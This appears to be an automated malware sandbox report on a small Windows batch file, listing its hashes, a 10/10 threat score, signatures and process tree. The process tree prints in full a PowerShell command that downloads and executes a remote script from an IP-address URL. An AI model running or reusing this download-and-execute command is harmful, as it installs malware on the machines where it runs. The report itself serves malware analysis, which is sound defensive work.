Analysis
-
max time kernel
134s -
max time network
69s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
20-05-2020 23:10
General
-
Target
a1ced45242d2149282fc0a7230280012.bat
-
Size
217B
-
MD5
41b00aedcf17cecfbeb6362ce3bcd14f
-
SHA1
c18a004d285abadf2b5840c9bb31c5cb9ae3a80c
-
SHA256
33347fdae792b3a0eb66bd0476b6ddcfb4aa1334e8a0de8a7f0aa8b2d07daa50
-
SHA512
1f0c5e210b4485ba274345201f4e5e5a5c30e5d217a347835ff2e759a8522f322d7428d33b9a529ad134930f9d65ccf642f8c84be93dc8cca8aeac40061ec455
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a1ced45242d2149282fc0a7230280012.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012');Invoke-KZMZWDCRYF;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB